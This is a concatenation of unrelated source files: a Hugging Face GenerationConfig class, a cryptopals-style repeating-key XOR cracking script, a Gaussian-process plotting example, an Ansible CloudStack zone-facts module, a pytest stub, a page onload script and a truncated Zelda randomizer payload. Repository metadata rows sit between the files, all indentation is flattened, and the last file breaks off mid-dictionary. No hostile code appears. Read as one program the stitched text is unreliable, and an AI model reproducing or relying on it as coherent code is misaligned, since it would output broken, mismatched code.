decoder_start_token_id (`int`, *optional*):
If an encoder-decoder model starts decoding with a different token than *bos*, the id of that token.
> Wild card
generation_kwargs:
Additional generation kwargs will be forwarded to the `generate` function of the model. Kwargs that are not
present in `generate`'s signature will be used in the model forward pass.
"""
def __init__(self, **kwargs):
# Parameters that control the length of the output
self.max_length = kwargs.pop("max_length", 20)
self.max_new_tokens = kwargs.pop("max_new_tokens", None)
self.min_length = kwargs.pop("min_length", 0)
self.min_new_tokens = kwargs.pop("min_new_tokens", None)
self.early_stopping = kwargs.pop("early_stopping", False)
self.max_time = kwargs.pop("max_time", None)
# Parameters that control the generation strategy used
self.do_sample = kwargs.pop("do_sample", False)
self.num_beams = kwargs.pop("num_beams", 1)
self.num_beam_groups = kwargs.pop("num_beam_groups", 1)
self.penalty_alpha = kwargs.pop("penalty_alpha", None)
self.use_cache = kwargs.pop("use_cache", True)
# Parameters for manipulation of the model output logits
self.temperature = kwargs.pop("temperature", 1.0)
self.top_k = kwargs.pop("top_k", 50)
self.top_p = kwargs.pop("top_p", 1.0)
self.typical_p = kwargs.pop("typical_p", 1.0)
self.epsilon_cutoff = kwargs.pop("epsilon_cutoff", 0.0)
self.eta_cutoff = kwargs.pop("eta_cutoff", 0.0)
self.diversity_penalty = kwargs.pop("diversity_penalty", 0.0)
self.repetition_penalty = kwargs.pop("repetition_penalty", 1.0)
self.encoder_repetition_penalty = kwargs.pop("encoder_repetition_penalty", 1.0)
self.length_penalty = kwargs.pop("length_penalty", 1.0)
self.no_repeat_ngram_size = kwargs.pop("no_repeat_ngram_size", 0)
self.bad_words_ids = kwargs.pop("bad_words_ids", None)
self.force_words_ids = kwargs.pop("force_words_ids", None)
self.renormalize_logits = kwargs.pop("renormalize_logits", False)
self.constraints = kwargs.pop("constraints", None)
self.forced_bos_token_id = kwargs.pop("forced_bos_token_id", None)
self.forced_eos_token_id = kwargs.pop("forced_eos_token_id", None)
self.remove_invalid_values = kwargs.pop("remove_invalid_values", False)
self.exponential_decay_length_penalty = kwargs.pop("exponential_decay_length_penalty", None)
self.suppress_tokens = kwargs.pop("suppress_tokens", None)
self.begin_suppress_tokens = kwargs.pop("begin_suppress_tokens", None)
self.forced_decoder_ids = kwargs.pop("forced_decoder_ids", None)
self.sequence_bias = kwargs.pop("sequence_bias", None)
self.guidance_scale = kwargs.pop("guidance_scale", None)
# Parameters that define the output variables of `generate`
self.num_return_sequences = kwargs.pop("num_return_sequences", 1)
self.output_attentions = kwargs.pop("output_attentions", False)
self.output_hidden_states = kwargs.pop("output_hidden_states", False)
self.output_scores = kwargs.pop("output_scores", False)
self.return_dict_in_generate = kwargs.pop("return_dict_in_generate", False)
# Special tokens that can be used at generation time
self.pad_token_id = kwargs.pop("pad_token_id", None)
self.bos_token_id = kwargs.pop("bos_token_id", None)
self.eos_token_id = kwargs.pop("eos_token_id", None)
# Generation parameters exclusive to encoder-decoder models
self.encoder_no_repeat_ngram_size = kwargs.pop("encoder_no_repeat_ngram_size", 0)
self.decoder_start_token_id = kwargs.pop("decoder_start_token_id", None)
# Wild card
self.generation_kwargs = kwargs.pop("generation_kwargs", {})
# The remaining attributes do not parametrize `.generate()`, but are informative and/or used by the the hub
# interface.
self._from_model_config = kwargs.pop("_from_model_config", False)
self._commit_hash = kwargs.pop("_commit_hash", None)
self.transformers_version = kwargs.pop("transformers_version", __version__)
# Additional attributes without default values
if not self._from_model_config:
# we don't want to copy values from the model config if we're initializing a `GenerationConfig` from a
# model's default configuration file
for key, value in kwargs.items():
try:
setattr(self, key, value)
except AttributeError as err:
logger.error(f"Can't set {key} with value {value} for {self}")
raise err
# Validate the values of the attributes
self.validate()
def __eq__(self, other):
if not isinstance(other, GenerationConfig):
return False
self_dict = self.__dict__.copy()
other_dict = other.__dict__.copy()
# ignore metadata
for metadata_field in ("_from_model_config", "_commit_hash", "transformers_version"):
self_dict.pop(metadata_field, None)
other_dict.pop(metadata_field, None)
return self_dict == other_dict
def __repr__(self):
return f"{self.__class__.__name__} {self.to_json_string()}"
def validate(self):
"""
Validates the values of the attributes of the GenerationConfig instance, and raises a `ValueError` if any of
the values are invalid.
"""
if self.early_stopping not in {True, False, "never"}:
raise ValueError(f"`early_stopping` must be a boolean or 'never', but is {self.early_stopping}.")
def save_pretrained(
self,
save_directory: Union[str, os.PathLike],
config_file_name: Optional[Union[str, os.PathLike]] = None,
push_to_hub: bool = False,
**kwargs,
):
r"""
Save a generation configuration object to the directory `save_directory`, so that it can be re-loaded using the
[`~GenerationConfig.from_pretrained`] class method.
Args:
save_directory (`str` or `os.PathLike`):
Directory where the configuration JSON file will be saved (will be created if it does not exist).
config_file_name (`str` or `os.PathLike`, *optional*, defaults to `"generation_config.json"`):
Name of the generation configuration JSON file to be saved in `save_directory`.
push_to_hub (`bool`, *optional*, defaults to `False`):
Whether or not to push your model to the Hugging Face model hub after saving it. You can specify the
repository you want to push to with `repo_id` (will default to the name of `save_directory` in your
namespace).
kwargs (`Dict[str, Any]`, *optional*):
Additional key word arguments passed along to the [`~utils.PushToHubMixin.push_to_hub`] method.
"""
config_file_name = config_file_name if config_file_name is not None else GENERATION_CONFIG_NAME
if os.path.isfile(save_directory):
raise AssertionError(f"Provided path ({save_directory}) should be a directory, not a file")
os.makedirs(save_directory, exist_ok=True)
if push_to_hub:
commit_message = kwargs.pop("commit_message", None)
repo_id = kwargs.pop("repo_id", save_directory.split(os.path.sep)[-1])
repo_id = self._create_repo(repo_id, **kwargs)
files_timestamps = self._get_files_timestamps(save_directory)
output_config_file = os.path.join(save_directory, config_file_name)
self.to_json_file(output_config_file, use_diff=True)
logger.info(f"Configuration saved in {output_config_file}")
if push_to_hub:
self._upload_modified_files(
save_directory,
repo_id,
files_timestamps,
commit_message=commit_message,
token=kwargs.get("use_auth_token"),
)
@classmethod
def from_pretrained(
cls,
pretrained_model_name: Union[str, os.PathLike],
config_file_name: Optional[Union[str, os.PathLike]] = None,
cache_dir: Optional[Union[str, os.PathLike]] = None,
force_download: bool = False,
local_files_only: bool = False,
token: Optional[Union[str, bool]] = None,
revision: str = "main",
**kwargs,
) -> "GenerationConfig":
r"""
Instantiate a [`GenerationConfig`] from a generation configuration file.
Args:
pretrained_model_name (`str` or `os.PathLike`):
This can be either:
- a string, the *model id* of a pretrained model configuration hosted inside a model repo on
huggingface.co. Valid model ids can be located at the root-level, like `bert-base-uncased`, or
namespaced under a user or organization name, like `dbmdz/bert-base-german-cased`.
- a path to a *directory* containing a configuration file saved using the
[`~GenerationConfig.save_pretrained`] method, e.g., `./my_model_directory/`.
config_file_name (`str` or `os.PathLike`, *optional*, defaults to `"generation_config.json"`):
Name of the generation configuration JSON file to be loaded from `pretrained_model_name`.
cache_dir (`str` or `os.PathLike`, *optional*):
Path to a directory in which a downloaded pretrained model configuration should be cached if the
standard cache should not be used.
force_download (`bool`, *optional*, defaults to `False`):
Whether or not to force to (re-)download the configuration files and override the cached versions if
they exist.
resume_download (`bool`, *optional*, defaults to `False`):
Whether or not to delete incompletely received file. Attempts to resume the download if such a file
exists.
proxies (`Dict[str, str]`, *optional*):
A dictionary of proxy servers to use by protocol or endpoint, e.g., `{'http': 'foo.bar:3128',
'http://hostname': 'foo.bar:4012'}.` The proxies are used on each request.
token (`str` or `bool`, *optional*):
The token to use as HTTP bearer authorization for remote files. If `True`, or not specified, will use
the token generated when running `huggingface-cli login` (stored in `~/.huggingface`).
revision (`str`, *optional*, defaults to `"main"`):
The specific model version to use. It can be a branch name, a tag name, or a commit id, since we use a
git-based system for storing models and other artifacts on huggingface.co, so `revision` can be any
identifier allowed by git.
<Tip>
To test a pull request you made on the Hub, you can pass `revision="refs/pr/<pr_number>".
</Tip>
return_unused_kwargs (`bool`, *optional*, defaults to `False`):
If `False`, then this function returns just the final configuration object.
If `True`, then this functions returns a `Tuple(config, unused_kwargs)` where *unused_kwargs* is a
dictionary consisting of the key/value pairs whose keys are not configuration attributes: i.e., the
part of `kwargs` which has not been used to update `config` and is otherwise ignored.
subfolder (`str`, *optional*, defaults to `""`):
In case the relevant files are located inside a subfolder of the model repo on huggingface.co, you can
specify the folder name here.
kwargs (`Dict[str, Any]`, *optional*):
The values in kwargs of any keys which are configuration attributes will be used to override the loaded
values. Behavior concerning key/value pairs whose keys are *not* configuration attributes is controlled
by the `return_unused_kwargs` keyword parameter.
Returns:
[`GenerationConfig`]: The configuration object instantiated from this pretrained model.
Examples:
```python
>>> from transformers import GenerationConfig
>>> # Download configuration from huggingface.co and cache.
>>> generation_config = GenerationConfig.from_pretrained("gpt2")
>>> # E.g. config was saved using *save_pretrained('./test/saved_model/')*
>>> generation_config.save_pretrained("./test/saved_model/")
>>> generation_config = GenerationConfig.from_pretrained("./test/saved_model/")
>>> # You can also specify configuration names to your generation configuration file
>>> generation_config.save_pretrained("./test/saved_model/", config_file_name="my_configuration.json")
>>> generation_config = GenerationConfig.from_pretrained("./test/saved_model/", "my_configuration.json")
>>> # If you'd like to try a minor variation to an existing configuration, you can also pass generation
>>> # arguments to `.from_pretrained()`. Be mindful that typos and unused arguments will be ignored
>>> generation_config, unused_kwargs = GenerationConfig.from_pretrained(
... "gpt2", top_k=1, foo=False, return_unused_kwargs=True
... )
>>> generation_config.top_k
1
>>> unused_kwargs
{'foo': False}
```"""
config_file_name = config_file_name if config_file_name is not None else GENERATION_CONFIG_NAME
resume_download = kwargs.pop("resume_download", False)
proxies = kwargs.pop("proxies", None)
use_auth_token = kwargs.pop("use_auth_token", None)
subfolder = kwargs.pop("subfolder", "")
from_pipeline = kwargs.pop("_from_pipeline", None)
from_auto_class = kwargs.pop("_from_auto", False)
commit_hash = kwargs.pop("_commit_hash", None)
if use_auth_token is not None:
warnings.warn(
"The `use_auth_token` argument is deprecated and will be removed in v5 of Transformers.", FutureWarning
)
if token is not None:
raise ValueError(
"`token` and `use_auth_token` are both specified. Please set only the argument `token`."
)
token = use_auth_token
user_agent = {"file_type": "config", "from_auto_class": from_auto_class}
if from_pipeline is not None:
user_agent["using_pipeline"] = from_pipeline
config_path = os.path.join(pretrained_model_name, config_file_name)
config_path = str(config_path)
is_local = os.path.exists(config_path)
if os.path.isfile(os.path.join(subfolder, config_path)):
# Special case when config_path is a local file
resolved_config_file = config_path
is_local = True
elif is_remote_url(config_path):
configuration_file = config_path
resolved_config_file = download_url(config_path)
else:
configuration_file = config_file_name
try:
# Load from local folder or from cache or download from model Hub and cache
resolved_config_file = cached_file(
pretrained_model_name,
configuration_file,
cache_dir=cache_dir,
force_download=force_download,
proxies=proxies,
resume_download=resume_download,
local_files_only=local_files_only,
use_auth_token=token,
user_agent=user_agent,
revision=revision,
subfolder=subfolder,
_commit_hash=commit_hash,
)
commit_hash = extract_commit_hash(resolved_config_file, commit_hash)
except EnvironmentError:
# Raise any environment error raise by `cached_file`. It will have a helpful error message adapted to
# the original exception.
raise
except Exception:
# For any other exception, we throw a generic error.
raise EnvironmentError(
f"Can't load the configuration of '{pretrained_model_name}'. If you were trying to load it"
" from 'https://huggingface.co/models', make sure you don't have a local directory with the same"
f" name. Otherwise, make sure '{pretrained_model_name}' is the correct path to a directory"
f" containing a {configuration_file} file"
)
try:
# Load config dict
config_dict = cls._dict_from_json_file(resolved_config_file)
config_dict["_commit_hash"] = commit_hash
except (json.JSONDecodeError, UnicodeDecodeError):
raise EnvironmentError(
f"It looks like the config file at '{resolved_config_file}' is not a valid JSON file."
)
if is_local:
logger.info(f"loading configuration file {resolved_config_file}")
else:
logger.info(f"loading configuration file {configuration_file} from cache at {resolved_config_file}")
return cls.from_dict(config_dict, **kwargs)
@classmethod
def _dict_from_json_file(cls, json_file: Union[str, os.PathLike]):
with open(json_file, "r", encoding="utf-8") as reader:
text = reader.read()
return json.loads(text)
@classmethod
def from_dict(cls, config_dict: Dict[str, Any], **kwargs) -> "GenerationConfig":
"""
Instantiates a [`GenerationConfig`] from a Python dictionary of parameters.
Args:
config_dict (`Dict[str, Any]`):
Dictionary that will be used to instantiate the configuration object.
kwargs (`Dict[str, Any]`):
Additional parameters from which to initialize the configuration object.
Returns:
[`GenerationConfig`]: The configuration object instantiated from those parameters.
"""
return_unused_kwargs = kwargs.pop("return_unused_kwargs", False)
# Those arguments may be passed along for our internal telemetry.
# We remove them so they don't appear in `return_unused_kwargs`.
kwargs.pop("_from_auto", None)
kwargs.pop("_from_pipeline", None)
# The commit hash might have been updated in the `config_dict`, we don't want the kwargs to erase that update.
if "_commit_hash" in kwargs and "_commit_hash" in config_dict:
kwargs["_commit_hash"] = config_dict["_commit_hash"]
# The line below allows model-specific config to be loaded as well through kwargs, with safety checks.
# See https://github.com/huggingface/transformers/pull/21269
config = cls(**{**config_dict, **kwargs})
unused_kwargs = config.update(**kwargs)
logger.info(f"Generate config {config}")
if return_unused_kwargs:
return config, unused_kwargs
else:
return config
def dict_torch_dtype_to_str(self, d: Dict[str, Any]) -> None:
"""
Checks whether the passed dictionary and its nested dicts have a *torch_dtype* key and if it's not None,
converts torch.dtype to a string of just the type. For example, `torch.float32` get converted into *"float32"*
string, which can then be stored in the json format.
"""
if d.get("torch_dtype", None) is not None and not isinstance(d["torch_dtype"], str):
d["torch_dtype"] = str(d["torch_dtype"]).split(".")[1]
for value in d.values():
if isinstance(value, dict):
self.dict_torch_dtype_to_str(value)
def to_diff_dict(self) -> Dict[str, Any]:
"""
Removes all attributes from config which correspond to the default config attributes for better readability and
serializes to a Python dictionary.
Returns:
`Dict[str, Any]`: Dictionary of all the attributes that make up this configuration instance,
"""
config_dict = self.to_dict()
# get the default config dict
default_config_dict = GenerationConfig().to_dict()
serializable_config_dict = {}
# only serialize values that differ from the default config
for key, value in config_dict.items():
if key not in default_config_dict or key == "transformers_version" or value != default_config_dict[key]:
serializable_config_dict[key] = value
self.dict_torch_dtype_to_str(serializable_config_dict)
return serializable_config_dict
def to_dict(self) -> Dict[str, Any]:
"""
Serializes this instance to a Python dictionary.
Returns:
`Dict[str, Any]`: Dictionary of all the attributes that make up this configuration instance.
"""
output = copy.deepcopy(self.__dict__)
if "_commit_hash" in output:
del output["_commit_hash"]
# Transformers version when serializing this file
output["transformers_version"] = __version__
self.dict_torch_dtype_to_str(output)
return output
def to_json_string(self, use_diff: bool = True) -> str:
"""
Serializes this instance to a JSON string.
Args:
use_diff (`bool`, *optional*, defaults to `True`):
If set to `True`, only the difference between the config instance and the default `GenerationConfig()`
is serialized to JSON string.
Returns:
`str`: String containing all the attributes that make up this configuration instance in JSON format.
"""
if use_diff is True:
config_dict = self.to_diff_dict()
else:
config_dict = self.to_dict()
return json.dumps(config_dict, indent=2, sort_keys=True) + "\n"
def to_json_file(self, json_file_path: Union[str, os.PathLike], use_diff: bool = True):
"""
Save this instance to a JSON file.
Args:
json_file_path (`str` or `os.PathLike`):
Path to the JSON file in which this configuration instance's parameters will be saved.
use_diff (`bool`, *optional*, defaults to `True`):
If set to `True`, only the difference between the config instance and the default `GenerationConfig()`
is serialized to JSON file.
"""
with open(json_file_path, "w", encoding="utf-8") as writer:
writer.write(self.to_json_string(use_diff=use_diff))
@classmethod
def from_model_config(cls, model_config: PretrainedConfig) -> "GenerationConfig":
"""
Instantiates a [`GenerationConfig`] from a [`PretrainedConfig`]. This function is useful to convert legacy
[`PretrainedConfig`] objects, which may contain generation parameters, into a stand-alone [`GenerationConfig`].
Args:
model_config (`PretrainedConfig`):
The model config that will be used to instantiate the generation config.
Returns:
[`GenerationConfig`]: The configuration object instantiated from those parameters.
"""
config_dict = model_config.to_dict()
config_dict.pop("_from_model_config", None)
config = cls.from_dict(config_dict, return_unused_kwargs=False, _from_model_config=True)
# Special case: some models have generation attributes set in the decoder. Use them if still unset in the
# generation config.
for decoder_name in ("decoder", "generator", "text_config"):
if decoder_name in config_dict:
default_generation_config = GenerationConfig()
decoder_config = config_dict[decoder_name]
for attr in config.to_dict().keys():
if attr in decoder_config and getattr(config, attr) == getattr(default_generation_config, attr):
setattr(config, attr, decoder_config[attr])
return config
def update(self, **kwargs):
"""
Updates attributes of this class instance with attributes from `kwargs` if they match existing atributtes,
returning all the unused kwargs.
Args:
kwargs (`Dict[str, Any]`):
Dictionary of attributes to tentatively update this class.
Returns:
`Dict[str, Any]`: Dictionary containing all the key-value pairs that were not used to update the instance.
"""
to_remove = []
for key, value in kwargs.items():
if hasattr(self, key):
setattr(self, key, value)
to_remove.append(key)
# remove all the attributes that were updated, without modifying the input dict
unused_kwargs = {key: value for key, value in kwargs.items() if key not in to_remove}
return unused_kwargs
| [
"noreply@github.com"
] | pytorch-tpu.noreply@github.com |
00c989258ab015ff4cdd1d241d09ff53a6d04033 | 3c4a345c530d8a9df163fad6c438e504e196dda0 | /Challenge6.py | 1addee14b3688487646a776c43d0baf02040f09d | [] | no_license | vebzical/kryptokamut | 9d096810e987bc730f5ed710468b2e2b83401bd0 | 5363185d09199608600c9d1bc7c71e51311a1d84 | refs/heads/master | 2020-05-09T15:16:12.247060 | 2019-04-15T09:47:39 | 2019-04-15T09:47:39 | 181,227,713 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,138 | py | #/usr/bin/python
import base64
import freqAnalysis
def XOR(input, key):
result = b''
for x,y in zip(input, key):
result += bytes([x ^ y])
return result
def findKeyLen(chiphertext):
final_dist = []
for keysize in range(2,41):
distances = []
chunks = [chiphertext[i:i+keysize] for i in range(0, len(chiphertext), keysize)]
for x in range(len(chunks)):
if x >= (len(chunks)-1):
break;
one = chunks[x]
two = chunks[x+1]
distances.append(calcHammingDistance(one,two)/keysize)
chunks.remove(one)
chunks.remove(two)
final_dist.append([sum(distances)/len(distances), keysize])
sorted_by_second = sorted(final_dist, key=lambda tup: tup[0])
return sorted_by_second[0][1]
def calcHammingDistance(str1, str2):
xord = XOR(str1,str2)
distance = 0
for byte in xord:
for bit in bin(byte):
if bit == '1':
distance += 1
return distance
def XORSingleChar(text, key):
result = b''
for x in text:
result += bytes([x ^ key])
return result
def XORSingleCharBruteforce(input):
messages = []
for y in range(256):
result = b''
result = XORSingleChar(input, y)
messages.append([result, y, freqAnalysis.englishFreqMatchScore(str(result))])
return sorted(messages, key=lambda x: x[2], reverse=True)[0]
def XORRepeatingKey(input, key):
result = b''
y = 0
for x in range(len(input)):
if y >= len(key):
y = 0;
result += bytes([input[x] ^ key[y]])
y += 1
return result
input = ""
with open('6.txt', 'r') as f:
for line in f:
input += line.rstrip()
chiphertext = base64.b64decode(input)
keylen = findKeyLen(chiphertext)
key = b""
plaintexts = []
#Do the Transpose
for i in range(keylen):
block = b''
for j in range(i, len(chiphertext), keylen):
block += bytes([chiphertext[j]])
key += bytes([XORSingleCharBruteforce(block)[1]])
result = XORRepeatingKey(chiphertext, key)
plaintexts.append([result,key,freqAnalysis.englishFreqMatchScore(str(result))])
maxscore = max(plaintexts, key=lambda x:x[2])[2]
for i in sorted(plaintexts, key=lambda x: x[2], reverse=True):
if i[2] == maxscore:
print(i)
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
04dab0209f29ce27605490d094bcc4294c4d3171 | 3cbb592ca471540cc704a547f71f9d6b84669976 | /python/infpy/gp/examples/simple_example.py | f3ecb0972d8eb65d6185c5d3a3f8129c66167827 | [
"BSD-2-Clause"
] | permissive | JohnReid/infpy | a9c896a556abed8ed3abd5e56ca86d31a7a731c0 | 1b825ba7a60f0a0489df5f41b273374aef628a60 | refs/heads/master | 2021-01-01T16:56:27.743588 | 2018-06-28T21:44:17 | 2018-06-28T21:44:17 | 13,087,025 | 5 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,824 | py | #
# Copyright John Reid 2008
#
import numpy
import pylab
import infpy.gp
def save_fig(prefix):
"Save current figure in extended postscript and PNG formats."
pylab.savefig('%s.png' % prefix, format='PNG')
pylab.savefig('%s.eps' % prefix, format='EPS')
# Generate some noisy data from a modulated sin curve
x_min, x_max = 10.0, 100.0
X = infpy.gp.gp_1D_X_range(x_min, x_max) # input domain
Y = 10.0 * numpy.sin(X[:, 0]) / X[:, 0] # noise free output
Y = infpy.gp.gp_zero_mean(Y) # shift so mean=0.
e = 0.03 * numpy.random.normal(size=len(Y)) # noise
f = Y + e # noisy output
# plot the noisy data
pylab.figure()
pylab.plot(X[:, 0], Y, 'b-', label='Y')
pylab.plot(X[:, 0], f, 'rs', label='f')
pylab.legend()
save_fig('simple-example-data')
pylab.close()
def predict_values(K, file_tag, learn=False):
"Create a GP with kernel K and predict values. Optionally learn K's hyperparameters if learn==True."
gp = infpy.gp.GaussianProcess(X, f, K)
if learn:
infpy.gp.gp_learn_hyperparameters(gp)
pylab.figure()
infpy.gp.gp_1D_predict(gp, 90, x_min - 10., x_max + 10.)
save_fig(file_tag)
pylab.close()
# import short forms of GP kernel names
import infpy.gp.kernel_short_names as kernels
# create a kernel composed of a squared exponential kernel and a small noise term
K = kernels.SE() + kernels.Noise(.1)
predict_values(K, 'simple-example-se')
# Try a different kernel with a shorter characteristic length scale
K = kernels.SE([.1]) + kernels.Noise(.1)
predict_values(K, 'simple-example-se-shorter')
# Try another kernel with a lot more noise
K = kernels.SE([4.]) + kernels.Noise(1.)
predict_values(K, 'simple-example-more-noise')
# Try to learn kernel hyper-parameters
K = kernels.SE([4.0]) + kernels.Noise(.1)
predict_values(K, 'simple-example-learnt', learn=True)
| [
"johnbaronreid@netscape.net"
] | johnbaronreid@netscape.net |
26c2daefb72b9b841d51c34f8ad6f2f23053f412 | 1fe0b680ce53bb3bb9078356ea2b25e572d9cfdc | /venv/lib/python2.7/site-packages/ansible/modules/cloud/cloudstack/cs_zone_facts.py | 92c815e95756f4fd8ec4bffffdc80dfdaf421e53 | [
"MIT"
] | permissive | otus-devops-2019-02/devopscourses_infra | 1929c4a9eace3fdb0eb118bf216f3385fc0cdb1c | e42e5deafce395af869084ede245fc6cff6d0b2c | refs/heads/master | 2020-04-29T02:41:49.985889 | 2019-05-21T06:35:19 | 2019-05-21T06:35:19 | 175,780,457 | 0 | 1 | MIT | 2019-05-21T06:35:20 | 2019-03-15T08:35:54 | HCL | UTF-8 | Python | false | false | 4,772 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016, René Moser <mail@renemoser.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cs_zone_facts
short_description: Gathering facts of zones from Apache CloudStack based clouds.
description:
- Gathering facts from the API of a zone.
- Sets Ansible facts accessable by the key C(cloudstack_zone) and since version 2.6 also returns results.
version_added: '2.1'
author: René Moser (@resmo)
options:
name:
description:
- Name of the zone.
type: str
required: true
aliases: [ zone ]
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
- name: Gather facts from a zone
cs_zone_facts:
name: ch-gva-1
register: zone
delegate_to: localhost
- name: Show the returned results of the registered variable
debug:
var: zone
- name: Show the facts by the ansible_facts key cloudstack_zone
debug:
var: cloudstack_zone
'''
RETURN = '''
---
id:
description: UUID of the zone.
returned: success
type: str
sample: 04589590-ac63-4ffc-93f5-b698b8ac38b6
name:
description: Name of the zone.
returned: success
type: str
sample: zone01
dns1:
description: First DNS for the zone.
returned: success
type: str
sample: 8.8.8.8
dns2:
description: Second DNS for the zone.
returned: success
type: str
sample: 8.8.4.4
internal_dns1:
description: First internal DNS for the zone.
returned: success
type: str
sample: 8.8.8.8
internal_dns2:
description: Second internal DNS for the zone.
returned: success
type: str
sample: 8.8.4.4
dns1_ipv6:
description: First IPv6 DNS for the zone.
returned: success
type: str
sample: "2001:4860:4860::8888"
dns2_ipv6:
description: Second IPv6 DNS for the zone.
returned: success
type: str
sample: "2001:4860:4860::8844"
allocation_state:
description: State of the zone.
returned: success
type: str
sample: Enabled
domain:
description: Domain the zone is related to.
returned: success
type: str
sample: ROOT
network_domain:
description: Network domain for the zone.
returned: success
type: str
sample: example.com
network_type:
description: Network type for the zone.
returned: success
type: str
sample: basic
local_storage_enabled:
description: Local storage offering enabled.
returned: success
type: bool
sample: false
securitygroups_enabled:
description: Security groups support is enabled.
returned: success
type: bool
sample: false
guest_cidr_address:
description: Guest CIDR address for the zone
returned: success
type: str
sample: 10.1.1.0/24
dhcp_provider:
description: DHCP provider for the zone
returned: success
type: str
sample: VirtualRouter
zone_token:
description: Zone token
returned: success
type: str
sample: ccb0a60c-79c8-3230-ab8b-8bdbe8c45bb7
tags:
description: List of resource tags associated with the zone.
returned: success
type: dict
sample: [ { "key": "foo", "value": "bar" } ]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.cloudstack import (
AnsibleCloudStack,
cs_argument_spec,
)
class AnsibleCloudStackZoneFacts(AnsibleCloudStack):
def __init__(self, module):
super(AnsibleCloudStackZoneFacts, self).__init__(module)
self.returns = {
'dns1': 'dns1',
'dns2': 'dns2',
'internaldns1': 'internal_dns1',
'internaldns2': 'internal_dns2',
'ipv6dns1': 'dns1_ipv6',
'ipv6dns2': 'dns2_ipv6',
'domain': 'network_domain',
'networktype': 'network_type',
'securitygroupsenabled': 'securitygroups_enabled',
'localstorageenabled': 'local_storage_enabled',
'guestcidraddress': 'guest_cidr_address',
'dhcpprovider': 'dhcp_provider',
'allocationstate': 'allocation_state',
'zonetoken': 'zone_token',
}
def get_zone(self):
return super(AnsibleCloudStackZoneFacts, self).get_zone()
def main():
argument_spec = cs_argument_spec()
argument_spec.update(dict(
zone=dict(required=True, aliases=['name']),
))
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
acs_zone_facts = AnsibleCloudStackZoneFacts(module=module)
result = acs_zone_facts.get_result_and_facts(
facts_name='cloudstack_zone',
resource=acs_zone_facts.get_zone()
)
module.exit_json(**result)
if __name__ == '__main__':
main()
| [
"skydevapp@gmail.com"
] | skydevapp@gmail.com |
7707734bcaccebbdf25b7547c1dcf12bc305d2b3 | d8c899ca71e511ec0b60b79f11eeb08077ad7b7b | /stubs/pytest/mark.pyi | d1733cfb0524484bc786f3bdab20d218b6b2edca | [
"Apache-2.0"
] | permissive | Michaelll123/sensibility | ff9972baa979745e91f96a1e4953ebe42d7258b5 | 7436ac2fd4faf100b5e21c28b61a431adce06091 | refs/heads/master | 2023-08-30T05:57:05.750677 | 2021-11-14T09:45:57 | 2021-11-14T09:45:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | pyi | from typing import Callable
class skip:
def __init__(self, test: Callable=None, reason: str=None) -> None: ...
def __call__(self, test: Callable) -> Callable: ...
def skipif(condition: bool, reason: str=None) -> Callable[[Callable], Callable]: ...
def xfail(Callable) -> Callable: ...
| [
"easantos@ualberta.ca"
] | easantos@ualberta.ca |
8888104655043e44fc68662cec6bd63cc8bbddee | fced25b055ec68ee522bd156c3be5902172beb55 | /Pages/logs/Actions-logs/onload.py | c209484f123b9b8aeafa573b8463db94067a17c0 | [] | no_license | EAC-Technology/eApp-Builder | 3cff5576139b78fc507406e31a4b5201eab436b7 | c3bbadde24330fb2dff4aa2c32cc6b11e044fbc9 | refs/heads/master | 2021-08-16T23:56:54.241674 | 2017-11-20T14:15:10 | 2017-11-20T14:15:10 | 111,399,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,057 | py | """
"""
from ProSuiteLogsPage import ProSuiteLogsPage
page = ProSuiteLogsPage(self)
page.vdom_objects = {
"growl": self.growl,
"logs.data": self.logs_cnt.hpt,
"topbar.download.btn": self.dwnloadlogs_btn,
"topbar.autoupdate.btn": self.autoupdate.checkbtn,
"dialogs.download": self.dwnload_logs_dialog,
"dialogs.download.close": self.dwnload_logs_dialog.close_btn,
"popup.loglevel": self.loglevelsform,
"popup.loglevel.form": self.loglevelsform,
"popup.loglevel.form.list": self.loglevelsform.lv,
"popup.loglevel.form.hide": self.loglevelsform.hidebtn,
"popup.loglevel.form.reset": self.loglevelsform.resetbtn,
"popup.loglevel.form.submit": self.loglevelsform.submitbtn,
"popup.loggers": self.loggersform,
"popup.loggers.form": self.loggersform,
"popup.loggers.form.list": self.loggersform.lg,
"popup.loggers.form.reset": self.loggersform.resetbtn,
"popup.loggers.form.hide": self.loggersform.hidebtn,
"popup.loggers.form.submit": self.loggersform.submitbtn,
}
page.run('onload') | [
"alain.abraham@web-atrio.com"
] | alain.abraham@web-atrio.com |
4137fadb32c4261d86e597d9593e759c7a36561c | 3c9e5a16b1625faf82e2e714aff119ef49033d50 | /pyz3r/customizer.py | a99d223ea06d60991a2a63a3c54122966bf14d4e | [
"Apache-2.0"
] | permissive | tcprescott/pyz3r | 144ef0dacec1ed76e10df6a8acb350fb843e2847 | fb90559650098090a9e800ca3d4b3d337473942a | refs/heads/master | 2023-09-05T09:26:56.927172 | 2023-09-05T04:45:37 | 2023-09-05T04:45:37 | 163,603,582 | 24 | 8 | Apache-2.0 | 2023-08-29T03:08:51 | 2018-12-30T17:02:35 | Python | UTF-8 | Python | false | false | 16,726 | py | import copy
import math
BASE_CUSTOMIZER_PAYLOAD = {
"glitches": "none",
"item_placement": "advanced",
"dungeon_items": "standard",
"accessibility": "items",
"goal": "ganon",
"crystals": {
"ganon": "7",
"tower": "7"
},
"mode": "open",
"weapons": "randomized",
"hints": "on",
"item": {
"pool": "normal",
"functionality": "normal"
},
"tournament": False,
"spoilers": "on",
"lang": "en",
"allow_quickswap": False,
"enemizer": {
"boss_shuffle": "none",
"enemy_shuffle": "none",
"enemy_damage": "default",
"enemy_health": "default",
"pot_shuffle": "off"
},
"name": "",
"notes": "",
"l": {},
"eq": ["BossHeartContainer", "BossHeartContainer", "BossHeartContainer"],
"drops": {
"0": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
